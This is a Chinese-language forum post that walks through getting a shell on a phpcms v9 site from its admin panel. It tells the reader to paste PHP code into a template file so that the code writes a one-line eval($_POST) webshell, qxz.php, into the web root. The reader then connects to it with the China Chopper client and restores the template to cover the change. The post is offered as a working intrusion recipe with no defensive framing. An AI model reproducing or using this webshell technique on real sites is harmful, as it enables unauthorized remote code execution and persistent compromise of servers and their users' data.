热搜词
记一次phpcms v9后台拿shell过程
灰儿 管理员 发消息 加好友 打招呼
发表于 2014-3-27 18:14:13 | 显示全部楼层 |阅读模式
记一次phpcms v9后台拿shell过程
登录进入后台管理后,点击界面,模板风格,然后点击祥细列表,如下图:
2014030800240200.jpg
然后点击 search 这个文件夹,如下图:
2014030800240501.jpg
然后点击修改 index.html 文件
然后把以下代码复制上去提交。
<?
$fp = @fopen(“qxz.php”, ‘a’);
@fwrite($fp, ‘<’.'?php’.” ”.’eval($_POST[hacker])’.” ?”.”> ”);
@fclose($fp);
?>
提示:修改前先把原来的代码备份一下,拿到shell后把他改回去。
2014030800241002.jpg
提交后点击可视化一下
2014030800241303.jpg
这样在网站的根目录就生成了你的一句话木马客户端 qxz.php
拿起菜刀链接 http://www.xxx.com/qxz.php
2014030800241504.jpg
phpcms
回复

使用道具 举报

全部评论0
返回列表 发新帖
回复
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

发布新帖

本文内容不够精彩,我要自己发布

TA的新帖

QQ|Archiver|手机版|小黑屋|管理员之家 ( 苏ICP备2023053177号-2 )

GMT+8, 2024-9-20 09:09 , Processed in 0.203962 second(s), 30 queries .

Powered by Discuz! X3.5

Cpoyright © 2001-2024 Discuz! Team